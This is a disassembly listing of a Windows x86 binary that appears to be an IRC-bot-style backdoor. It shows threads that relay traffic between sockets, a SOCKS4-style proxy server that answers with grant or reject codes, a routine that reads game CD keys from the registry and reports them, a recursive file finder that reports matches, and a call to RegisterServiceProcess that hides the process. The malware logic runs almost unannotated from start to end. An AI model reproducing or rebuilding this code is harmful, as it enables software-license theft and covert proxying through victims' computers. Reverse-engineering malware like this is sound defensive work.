call dword_43CAB0 ; inet_ntoa
push eax
lea eax, [ebp+var_34C]
push offset unk_427BD0
push eax
call sub_415316
push edi
lea eax, [ebp+var_34C]
push 10h
push eax
call sub_414DDA
mov [ebp+var_38], eax
imul eax, 234h
mov ecx, [ebp+var_3C]
add esp, 20h
mov dword_441B9C[eax], ecx
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_14C]
push esi
push eax
push offset sub_407CBD
push esi
push esi
call dword_42108C ; CreateThread
mov ecx, [ebp+var_38]
imul ecx, 234h
cmp eax, esi
mov dword_441BAC[ecx], eax
jnz short loc_407C8F
call dword_421088 ; RtlGetLastWin32Error
push eax
push offset unk_427B80
call sub_40B0EC
pop ecx
pop ecx
jmp short loc_407C9C
; ---------------------------------------------------------------------------
loc_407C87: ; CODE XREF: sub_407B36+15C�j
push 32h
call dword_421060 ; Sleep
loc_407C8F: ; CODE XREF: sub_407B36+13A�j
cmp [ebp+var_2C], esi
jz short loc_407C87
jmp loc_407BE0
; ---------------------------------------------------------------------------
loc_407C99: ; CODE XREF: sub_407B36+61�j
; sub_407B36+93�j ...
mov edi, [ebp+arg_0]
loc_407C9C: ; CODE XREF: sub_407B36+14F�j
push edi
call dword_43CABC ; closesocket
push ebx
call dword_43CABC ; closesocket
push [ebp+var_3C]
call sub_4150F0
pop ecx
push esi
call dword_421048 ; ExitThread
pop edi
pop esi
pop ebx
sub_407B36 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_407CBD proc near ; DATA XREF: sub_407B36+11C�o
var_1344 = byte ptr -1344h
var_344 = byte ptr -344h
var_144 = byte ptr -144h
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1344h
call sub_415B90
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
mov esi, eax
pop ecx
lea edi, [ebp+var_144]
rep movsd
mov ebx, [ebp+var_30]
xor ecx, ecx
inc ecx
push 6
push ecx
push 2
mov [eax+120h], ecx
mov [ebp+var_4], ebx
call dword_43CAA4 ; socket
mov esi, eax
xor edi, edi
cmp esi, 0FFFFFFFFh
mov [ebp+arg_0], esi
jz loc_407E20
push 10h
lea eax, [ebp+var_18]
push edi
push eax
call sub_415390
add esp, 0Ch
mov [ebp+var_18], 2
push [ebp+var_3C]
call dword_43CA24 ; ntohs
mov [ebp+var_16], ax
lea eax, [ebp+var_13C]
push eax
call dword_43CA64 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_407D4D
lea eax, [ebp+var_13C]
push eax
call dword_43CAA8 ; gethostbyname
jmp short loc_407D5B
; ---------------------------------------------------------------------------
loc_407D4D: ; CODE XREF: sub_407CBD+7F�j
push 2
lea eax, [ebp+var_8]
push 4
push eax
call dword_43C9DC ; gethostbyaddr
loc_407D5B: ; CODE XREF: sub_407CBD+8E�j
cmp eax, edi
jz loc_407E20
mov eax, [eax+0Ch]
push 10h
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_14], eax
lea eax, [ebp+var_18]
push eax
push esi
call dword_43C9CC ; connect
cmp eax, 0FFFFFFFFh
jz loc_407E20
movzx eax, [ebp+var_16]
push [ebp+var_34]
mov [ebp+var_20], edi
push eax
push [ebp+var_14]
call dword_43CAB0 ; inet_ntoa
push eax
lea eax, [ebp+var_344]
push offset unk_427C80
push eax
call sub_415316
push esi
lea eax, [ebp+var_344]
push 10h
push eax
call sub_414DDA
imul ebx, 234h
mov [ebp+var_30], eax
imul eax, 234h
mov ecx, [ebp+var_34]
lea esi, dword_441BA4[ebx]
mov dword_441B9C[eax], ecx
add esp, 20h
mov ecx, [esi]
mov dword_441BA8[eax], ecx
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_144]
push edi
push eax
push offset sub_407EA5
push edi
push edi
call dword_42108C ; CreateThread
mov ecx, [ebp+var_30]
imul ecx, 234h
cmp eax, edi
mov dword_441BAC[ecx], eax
jnz short loc_407E59
call dword_421088 ; RtlGetLastWin32Error
push eax
push offset unk_427C28
call sub_40B0EC
pop ecx
pop ecx
loc_407E20: ; CODE XREF: sub_407CBD+44�j
; sub_407CBD+A0�j ...
mov eax, [ebp+var_4]
imul eax, 234h
push dword_441BA4[eax]
call dword_43CABC ; closesocket
push [ebp+arg_0]
call dword_43CABC ; closesocket
push [ebp+var_4]
call sub_4150F0
pop ecx
push edi
call dword_421048 ; ExitThread
pop edi
pop esi
pop ebx
loc_407E51: ; CODE XREF: sub_407CBD+19F�j
push 32h
call dword_421060 ; Sleep
loc_407E59: ; CODE XREF: sub_407CBD+14E�j
cmp [ebp+var_20], edi
jz short loc_407E51
mov ebx, 1000h
loc_407E63: ; CODE XREF: sub_407CBD+1E1�j
push ebx
lea eax, [ebp+var_1344]
push edi
push eax
call sub_415390
add esp, 0Ch
lea eax, [ebp+var_1344]
push edi
push ebx
push eax
push dword ptr [esi]
call dword_43CA3C ; recv
cmp eax, edi
jle short loc_407E20
push edi
push eax
lea eax, [ebp+var_1344]
push eax
push [ebp+arg_0]
call dword_43CA74 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_407E63
jmp loc_407E20
sub_407CBD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407EA5 proc near ; DATA XREF: sub_407CBD+130�o
var_1128 = byte ptr -1128h
var_128 = byte ptr -128h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1128h
call sub_415B90
mov eax, [ebp+arg_0]
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_128]
rep movsd
mov esi, [ebp+var_14]
mov dword ptr [eax+124h], 1
imul esi, 234h
mov edi, 1000h
loc_407EDC: ; CODE XREF: sub_407EA5+7C�j
push edi
lea eax, [ebp+var_1128]
push 0
push eax
call sub_415390
add esp, 0Ch
lea eax, [ebp+var_1128]
push 0
push edi
push eax
push dword_441BA8[esi]
call dword_43CA3C ; recv
test eax, eax
jle short loc_407F23
push 0
push eax
lea eax, [ebp+var_1128]
push eax
push dword_441BA4[esi]
call dword_43CA74 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_407EDC
loc_407F23: ; CODE XREF: sub_407EA5+61�j
push dword_441BA8[esi]
call dword_43CABC ; closesocket
push [ebp+var_14]
call sub_4150F0
pop ecx
push 0
call dword_421048 ; ExitThread
pop edi
pop esi
sub_407EA5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F42 proc near ; DATA XREF: sub_40CD3A+587C�o
var_2D4 = byte ptr -2D4h
var_D4 = dword ptr -0D4h
var_D0 = byte ptr -0D0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 10h
mov esi, eax
pop ebx
lea edi, [ebp+var_D4]
push 2Ch
mov [ebp+var_4], ebx
pop ecx
rep movsd
xor edi, edi
xor esi, esi
inc edi
push ebx
mov [eax+0A8h], edi
lea eax, [ebp+var_14]
push esi
push eax
call sub_415390
add esp, 0Ch
mov [ebp+var_14], 2
push [ebp+var_40]
call dword_43CA24 ; ntohs
push 6
push edi
push 2
mov [ebp+var_12], ax
mov [ebp+var_10], esi
call dword_43CAA4 ; socket
mov edi, eax
mov eax, [ebp+var_3C]
imul eax, 234h
push ebx
mov dword_441BA4[eax], edi
lea eax, [ebp+var_14]
push eax
push edi
call dword_43CA50 ; bind
test eax, eax
jnz loc_4080E3
push 0Ah
push edi
call dword_43CA4C ; listen
test eax, eax
jnz loc_4080E3
push [ebp+var_40]
push [ebp+var_D4]
call sub_40A08A
pop ecx
push eax
lea eax, [ebp+var_2D4]
push offset unk_427DC8
push eax
call sub_415316
add esp, 10h
cmp [ebp+var_30], esi
jnz short loc_40801D
push esi
lea eax, [ebp+var_2D4]
push [ebp+var_34]
push eax
lea eax, [ebp+var_D0]
push eax
push [ebp+var_D4]
call sub_412BD1
add esp, 14h
loc_40801D: ; CODE XREF: sub_407F42+B9�j
; sub_407F42+18A�j ...
lea eax, [ebp+var_2D4]
push eax
call sub_40B078
pop ecx
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push edi
call dword_43CAB8 ; accept
push [ebp+var_3C]
mov ebx, eax
movzx eax, [ebp+var_22]
push eax
mov [ebp+var_28], esi
push [ebp+var_20]
call dword_43CAB0 ; inet_ntoa
push eax
lea eax, [ebp+var_2D4]
push offset unk_427D70
push eax
call sub_415316
push ebx
lea eax, [ebp+var_2D4]
push 11h
push eax
call sub_414DDA
mov [ebp+var_38], eax
imul eax, 234h
mov ecx, [ebp+var_3C]
add esp, 20h
mov dword_441B9C[eax], ecx
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_D4]
push esi
push eax
push offset sub_408146
push esi
push esi
call dword_42108C ; CreateThread
mov ecx, [ebp+var_38]
imul ecx, 234h
cmp eax, esi
mov dword_441BAC[ecx], eax
jnz short loc_4080D9
call dword_421088 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2D4]
push offset unk_427D20
push eax
call sub_415316
add esp, 0Ch
jmp loc_40801D
; ---------------------------------------------------------------------------
loc_4080D1: ; CODE XREF: sub_407F42+19A�j
push 5
call dword_421060 ; Sleep
loc_4080D9: ; CODE XREF: sub_407F42+16D�j
cmp [ebp+var_28], esi
jz short loc_4080D1
jmp loc_40801D
; ---------------------------------------------------------------------------
loc_4080E3: ; CODE XREF: sub_407F42+7B�j
; sub_407F42+8C�j
push edi
call dword_43CABC ; closesocket
push [ebp+var_40]
lea eax, [ebp+var_2D4]
push offset unk_427CD8
push eax
call sub_415316
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_408126
push esi
lea eax, [ebp+var_2D4]
push [ebp+var_34]
push eax
lea eax, [ebp+var_D0]
push eax
push [ebp+var_D4]
call sub_412BD1
add esp, 14h
loc_408126: ; CODE XREF: sub_407F42+1C2�j
lea eax, [ebp+var_2D4]
push eax
call sub_40B078
push [ebp+var_3C]
call sub_4150F0
pop ecx
pop ecx
push esi
call dword_421048 ; ExitThread
pop edi
pop esi
pop ebx
sub_407F42 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408146 proc near ; DATA XREF: sub_407F42+14F�o
var_5D4 = dword ptr -5D4h
var_5D0 = dword ptr -5D0h
var_4D0 = byte ptr -4D0h
var_4CF = byte ptr -4CFh
var_4CE = word ptr -4CEh
var_4CC = dword ptr -4CCh
var_4C8 = byte ptr -4C8h
var_C8 = byte ptr -0C8h
var_44 = byte ptr -44h
var_2C = dword ptr -2Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 2Ch
mov esi, eax
pop ecx
lea edi, [ebp+var_C8]
rep movsd
mov esi, [ebp+var_2C]
xor edi, edi
mov [ebp+arg_0], esi
imul esi, 234h
inc edi
lea esi, dword_441BA4[esi]
mov [eax+0ACh], edi
xor ebx, ebx
mov eax, [esi]
mov [ebp+var_8], 5
mov [ebp+var_5D0], eax
lea eax, [ebp+var_8]
push eax
push ebx
lea eax, [ebp+var_5D4]
push ebx
push eax
push ebx
mov [ebp+var_4], ebx
mov [ebp+var_5D4], edi
call dword_43CA0C ; select
test eax, eax
jnz short loc_4081C7
push dword ptr [esi]
call dword_43CABC ; closesocket
push [ebp+arg_0]
call sub_4150F0
pop ecx
push ebx
call dword_421048 ; ExitThread
loc_4081C7: ; CODE XREF: sub_408146+67�j
push ebx
lea eax, [ebp+var_4D0]
push 408h
push eax
push dword ptr [esi]
call dword_43CA3C ; recv
test eax, eax
jg short loc_4081F8
push dword ptr [esi]
call dword_43CABC ; closesocket
push [ebp+arg_0]
call sub_4150F0
pop ecx
push ebx
call dword_421048 ; ExitThread
loc_4081F8: ; CODE XREF: sub_408146+98�j
cmp [ebp+var_4D0], 4
jnz loc_4083F2
cmp [ebp+var_4CF], 1
jnz loc_4083F2
cmp [ebp+var_44], bl
jz short loc_40828E
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_4C8]
push eax
call sub_415730
pop ecx
test eax, eax
pop ecx
jz short loc_40828E
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_4C8]
push eax
push offset unk_427EB0
call sub_40B0EC
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Dh
call sub_415390
add esp, 18h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call dword_43CA74 ; send
push dword ptr [esi]
call dword_43CABC ; closesocket
push [ebp+arg_0]
call sub_4150F0
pop ecx
push ebx
call dword_421048 ; ExitThread
loc_40828E: ; CODE XREF: sub_408146+CF�j
; sub_408146+E5�j
push 10h
lea eax, [ebp+var_18]
push ebx
push eax
call sub_415390
mov ax, [ebp+var_4CE]
add esp, 0Ch
mov [ebp+var_16], ax
mov eax, [ebp+var_4CC]
push 6
push edi
push 2
mov [ebp+var_18], 2
mov [ebp+var_14], eax
call dword_43CAA4 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_408326
call dword_43C9B8 ; WSAGetLastError
push eax
push offset unk_427E60
call sub_40B0EC
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Bh
call sub_415390
add esp, 14h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call dword_43CA74 ; send
push dword ptr [esi]
call dword_43CABC ; closesocket
push [ebp+arg_0]
call sub_4150F0
pop ecx
push ebx
call dword_421048 ; ExitThread
loc_408326: ; CODE XREF: sub_408146+181�j
lea eax, [ebp+var_18]
push 10h
push eax
push edi
call dword_43C9CC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_408395
call dword_43C9B8 ; WSAGetLastError
push eax
push offset unk_427E08
call sub_40B0EC
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Bh
call sub_415390
add esp, 14h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call dword_43CA74 ; send
push dword ptr [esi]
call dword_43CABC ; closesocket
push [ebp+arg_0]
call sub_4150F0
pop ecx
push ebx
call dword_421048 ; ExitThread
loc_408395: ; CODE XREF: sub_408146+1F0�j
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Ah
call sub_415390
add esp, 0Ch
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call dword_43CA74 ; send
push dword ptr [esi]
push edi
call sub_40840A
pop ecx
pop ecx
push edi
call dword_43CABC ; closesocket
push dword ptr [esi]
call dword_43CABC ; closesocket
push [ebp+arg_0]
call sub_4150F0
pop ecx
push ebx
call dword_421048 ; ExitThread
loc_4083F2: ; CODE XREF: sub_408146+B9�j
; sub_408146+C6�j
push dword ptr [esi]
call dword_43CABC ; closesocket
push [ebp+arg_0]
call sub_4150F0
pop ecx
push ebx
call dword_421048 ; ExitThread
sub_408146 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40840A proc near ; CODE XREF: sub_408146+286�p
var_504 = byte ptr -504h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 504h
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
mov esi, 400h
loc_408420: ; CODE XREF: sub_40840A+BE�j
; sub_40840A+EE�j
xor ecx, ecx
mov [ebp+var_100], ebx
inc ecx
xor eax, eax
mov [ebp+var_104], ecx
loc_408431: ; CODE XREF: sub_40840A+36�j
mov edx, [ebp+arg_0]
cmp [ebp+eax*4+var_100], edx
jz short loc_408442
inc eax
cmp eax, ecx
jb short loc_408431
loc_408442: ; CODE XREF: sub_40840A+31�j
cmp eax, ecx
jnz short loc_408456
mov [ebp+var_FC], edx
mov [ebp+var_104], 2
loc_408456: ; CODE XREF: sub_40840A+3A�j
push esi
lea eax, [ebp+var_504]
push edi
push eax
call sub_415390
add esp, 0Ch
lea eax, [ebp+var_104]
push edi
push edi
push edi
push eax
push edi
call dword_43CA0C ; select
lea eax, [ebp+var_104]
push eax
push ebx
call dword_43C91C ; __WSAFDIsSet
test eax, eax
jz short loc_4084B6
push edi
lea eax, [ebp+var_504]
push esi
push eax
push ebx
call dword_43CA3C ; recv
cmp eax, 0FFFFFFFFh
jz short loc_4084FE
push edi
push eax
lea eax, [ebp+var_504]
push eax
push [ebp+arg_0]
call dword_43CA74 ; send
cmp eax, 0FFFFFFFFh
jz short loc_4084FE
loc_4084B6: ; CODE XREF: sub_40840A+7E�j
lea eax, [ebp+var_104]
push eax
push [ebp+arg_0]
call dword_43C91C ; __WSAFDIsSet
test eax, eax
jz loc_408420
push edi
lea eax, [ebp+var_504]
push esi
push eax
push [ebp+arg_0]
call dword_43CA3C ; recv
cmp eax, 0FFFFFFFFh
jz short loc_4084FE
push edi
push eax
lea eax, [ebp+var_504]
push eax
push ebx
call dword_43CA74 ; send
cmp eax, 0FFFFFFFFh
jnz loc_408420
loc_4084FE: ; CODE XREF: sub_40840A+93�j
; sub_40840A+AA�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_40840A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408503 proc near ; CODE XREF: sub_40CD3A+525B�p
var_3F4 = byte ptr -3F4h
var_2F0 = byte ptr -2F0h
var_F0 = byte ptr -0F0h
var_70 = byte ptr -70h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 3F4h
push ebx
xor ebx, ebx
cmp off_427F04, ebx
mov [ebp+var_C], 80h
jz loc_4086AF
push esi
push edi
mov eax, offset off_427F04
mov esi, offset dword_427F10
mov edi, offset aSCdKeyS_ ; "%s CD Key: (%s)."
loc_408533: ; CODE XREF: sub_408503+1A4�j
lea ecx, [ebp+var_4]
push ecx
push 20019h
push ebx
push dword ptr [eax]
push dword ptr [esi-10h]
call dword_43CA94 ; RegOpenKeyExA
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_F0]
push eax
push ebx
push ebx
push dword ptr [esi-8]
push [ebp+var_4]
call dword_43C930 ; RegQueryValueExA
test eax, eax
jnz loc_408696
mov eax, [esi]
cmp eax, ebx
jz loc_40865A
push eax
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_3F4]
push offset aSS_3 ; "%s\\%s"
push eax
call sub_415316
lea eax, [ebp+var_3F4]
push offset aR ; "r"
push eax
call sub_415A08
add esp, 18h
cmp eax, ebx
mov [ebp+var_8], eax
jz loc_408696
push eax
jmp short loc_4085C3
; ---------------------------------------------------------------------------
loc_4085AE: ; CODE XREF: sub_408503+D0�j
push dword ptr [esi+4]
lea eax, [ebp+var_70]
push eax
call sub_4158E0
pop ecx
test eax, eax
pop ecx
jz short loc_4085D7
push [ebp+var_8]
loc_4085C3: ; CODE XREF: sub_408503+A9�j
lea eax, [ebp+var_70]
push 64h
push eax
call sub_416FDC
add esp, 0Ch
test eax, eax
jnz short loc_4085AE
jmp short loc_40864F
; ---------------------------------------------------------------------------
loc_4085D7: ; CODE XREF: sub_408503+BB�j
push 3Dh
push dword ptr [esi+4]
call sub_416F20
pop ecx
test eax, eax
pop ecx
lea eax, [ebp+var_70]
jz short loc_408616
push offset asc_429118 ; "="
push eax
call sub_416B3F
push offset asc_429118 ; "="
push ebx
call sub_416B3F
push eax
lea eax, [ebp+var_2F0]
push dword ptr [esi-4]
push edi
push eax
call sub_415316
add esp, 20h
jmp short loc_40862A
; ---------------------------------------------------------------------------
loc_408616: ; CODE XREF: sub_408503+E5�j
push eax
lea eax, [ebp+var_2F0]
push dword ptr [esi-4]
push edi
push eax
call sub_415316
add esp, 10h
loc_40862A: ; CODE XREF: sub_408503+111�j
push ebx
lea eax, [ebp+var_2F0]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
lea eax, [ebp+var_2F0]
push eax
call sub_40B078
add esp, 18h
loc_40864F: ; CODE XREF: sub_408503+D2�j
push [ebp+var_8]
call sub_415960
pop ecx
jmp short loc_408696
; ---------------------------------------------------------------------------
loc_40865A: ; CODE XREF: sub_408503+6A�j
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_2F0]
push dword ptr [esi-4]
push edi
push eax
call sub_415316
push ebx
lea eax, [ebp+var_2F0]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
lea eax, [ebp+var_2F0]
push eax
call sub_40B078
add esp, 28h
loc_408696: ; CODE XREF: sub_408503+60�j
; sub_408503+A2�j ...
push [ebp+var_4]
call dword_43CA00 ; RegCloseKey
add esi, 18h
lea eax, [esi-0Ch]
cmp [eax], ebx
jnz loc_408533
pop edi
pop esi
loc_4086AF: ; CODE XREF: sub_408503+19�j
pop ebx
leave
retn
sub_408503 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4086B2 proc near ; DATA XREF: sub_40CD3A+3B87�o
var_49C = byte ptr -49Ch
var_29C = dword ptr -29Ch
var_298 = byte ptr -298h
var_218 = byte ptr -218h
var_115 = byte ptr -115h
var_114 = byte ptr -114h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 49Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0A7h
mov esi, eax
lea edi, [ebp+var_29C]
rep movsd
mov dword ptr [eax+298h], 1
lea eax, [ebp+var_114]
push eax
call sub_415B10
xor ebx, ebx
cmp [ebp+eax+var_115], 5Ch
pop ecx
jnz short loc_408707
lea eax, [ebp+var_114]
push eax
call sub_415B10
pop ecx
mov [ebp+eax+var_115], bl
loc_408707: ; CODE XREF: sub_4086B2+3F�j
lea eax, [ebp+var_218]
push eax
push offset unk_429170
lea eax, [ebp+var_49C]
push 200h
push eax
call sub_41588A
add esp, 10h
cmp [ebp+var_8], ebx
jnz short loc_40874C
push ebx
lea eax, [ebp+var_49C]
push [ebp+var_C]
push eax
lea eax, [ebp+var_298]
push eax
push [ebp+var_29C]
call sub_412BD1
add esp, 14h
loc_40874C: ; CODE XREF: sub_4086B2+78�j
lea eax, [ebp+var_114]
push ebx
push eax
lea eax, [ebp+var_218]
push eax
lea eax, [ebp+var_298]
push [ebp+var_C]
push eax
push [ebp+var_29C]
call sub_4087CA
push eax
lea eax, [ebp+var_49C]
push offset unk_42913C
push eax
call sub_415316
add esp, 24h
cmp [ebp+var_8], ebx
jnz short loc_4087AA
push ebx
lea eax, [ebp+var_49C]
push [ebp+var_C]
push eax
lea eax, [ebp+var_298]
push eax
push [ebp+var_29C]
call sub_412BD1
add esp, 14h
loc_4087AA: ; CODE XREF: sub_4086B2+D6�j
lea eax, [ebp+var_49C]
push eax
call sub_40B078
push [ebp+var_10]
call sub_4150F0
pop ecx
pop ecx
push ebx
call dword_421048 ; ExitThread
pop edi
pop esi
pop ebx
sub_4086B2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4087CA proc near ; CODE XREF: sub_4086B2+B9�p
; sub_4087CA+9E�p
var_54C = byte ptr -54Ch
var_34C = byte ptr -34Ch
var_248 = byte ptr -248h
var_144 = byte ptr -144h
var_118 = byte ptr -118h
var_117 = byte ptr -117h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 54Ch
push ebx
push esi
push edi
mov esi, 104h
push [ebp+arg_10]
lea eax, [ebp+var_248]
push offset aS_3 ; "%s\\*"
push esi
push eax
call sub_41588A
mov edi, dword_4210A8
add esp, 10h
lea eax, [ebp+var_144]
push eax
lea eax, [ebp+var_248]
push eax
call edi ; FindFirstFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
mov ebx, offset aSS_3 ; "%s\\%s"
jz short loc_408887
loc_408816: ; CODE XREF: sub_4087CA+BB�j
test [ebp+var_144], 10h
jz short loc_408873
cmp [ebp+var_118], 2Eh
jnz short loc_40883A
cmp [ebp+var_117], 0
jz short loc_408873
cmp [ebp+var_117], 2Eh
jz short loc_408873
loc_40883A: ; CODE XREF: sub_4087CA+5C�j
lea eax, [ebp+var_118]
push eax
lea eax, [ebp+var_34C]
push [ebp+arg_10]
push ebx
push esi
push eax
call sub_41588A
push [ebp+arg_14]
lea eax, [ebp+var_34C]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4087CA
add esp, 2Ch
mov [ebp+arg_14], eax
loc_408873: ; CODE XREF: sub_4087CA+53�j
; sub_4087CA+65�j ...
lea eax, [ebp+var_144]
push eax
push [ebp+var_4]
call dword_4210A4 ; FindNextFileA
test eax, eax
jnz short loc_408816
loc_408887: ; CODE XREF: sub_4087CA+4A�j
push [ebp+var_4]
call dword_421098 ; FindClose
push [ebp+arg_C]
lea eax, [ebp+var_248]
push [ebp+arg_10]
push ebx
push esi
push eax
call sub_41588A
add esp, 14h
lea eax, [ebp+var_144]
push eax
lea eax, [ebp+var_248]
push eax
call edi ; FindFirstFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40890D
loc_4088BE: ; CODE XREF: sub_4087CA+141�j
lea eax, [ebp+var_118]
inc [ebp+arg_14]
push eax
lea eax, [ebp+var_54C]
push [ebp+arg_10]
push offset aFoundSS ; " Found: %s\\%s"
push 200h
push eax
call sub_41588A
push 1
lea eax, [ebp+var_54C]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
add esp, 28h
lea eax, [ebp+var_144]
push eax
push esi
call dword_4210A4 ; FindNextFileA
test eax, eax
jnz short loc_4088BE
loc_40890D: ; CODE XREF: sub_4087CA+F2�j
push esi
call dword_421098 ; FindClose
mov eax, [ebp+arg_14]
pop edi
pop esi
pop ebx
leave
retn
sub_4087CA endp
; =============== S U B R O U T I N E =======================================
sub_40891C proc near ; CODE XREF: sub_40C574+55�p
push ebx
push ebp
mov ebp, dword_4210C8
push esi
push edi
push offset aKernel32_dll_0 ; "kernel32.dll"
call ebp ; GetModuleHandleA
mov esi, dword_4210C4
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz loc_408A3C
push offset aSeterrormode ; "SetErrorMode"
push edi
call esi ; GetProcAddress
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push edi
mov dword_43CAD0, eax
call esi ; GetProcAddress
push offset aProcess32first ; "Process32First"
push edi
mov dword_43CA44, eax
call esi ; GetProcAddress
push offset aProcess32next ; "Process32Next"
push edi
mov dword_43CA28, eax
call esi ; GetProcAddress
push offset aModule32first ; "Module32First"
push edi
mov dword_43C944, eax
call esi ; GetProcAddress
push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA"
push edi
mov dword_43C8F0, eax
call esi ; GetProcAddress
push offset aGetlogicaldriv ; "GetLogicalDriveStringsA"
push edi
mov dword_43C920, eax
call esi ; GetProcAddress
push offset aGetdrivetypea ; "GetDriveTypeA"
push edi
mov dword_43C994, eax
call esi ; GetProcAddress
push offset aSearchpatha ; "SearchPathA"
push edi
mov dword_43CA84, eax
call esi ; GetProcAddress
push offset aQueryperforman ; "QueryPerformanceCounter"
push edi
mov dword_43CADC, eax
call esi ; GetProcAddress
push offset aQueryperform_0 ; "QueryPerformanceFrequency"
push edi
mov dword_43C950, eax
call esi ; GetProcAddress
cmp dword_43CAD0, ebx
mov dword_43C938, eax
jz short loc_408A1A
cmp dword_43CA44, ebx
jz short loc_408A1A
cmp dword_43CA28, ebx
jz short loc_408A1A
cmp dword_43C944, ebx
jz short loc_408A1A
cmp dword_43C920, ebx
jz short loc_408A1A
cmp dword_43C994, ebx
jz short loc_408A1A
cmp dword_43CA84, ebx
jz short loc_408A1A
cmp dword_43CADC, ebx
jz short loc_408A1A
cmp dword_43C950, ebx
jz short loc_408A1A
cmp eax, ebx
jnz short loc_408A24
loc_408A1A: ; CODE XREF: sub_40891C+B8�j
; sub_40891C+C0�j ...
mov dword_43CAE0, 1
loc_408A24: ; CODE XREF: sub_40891C+FC�j
push offset aRegisterservic ; "RegisterServiceProcess"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_43CA5C, eax
jz short loc_408A51
push 1
push ebx
call eax
jmp short loc_408A51
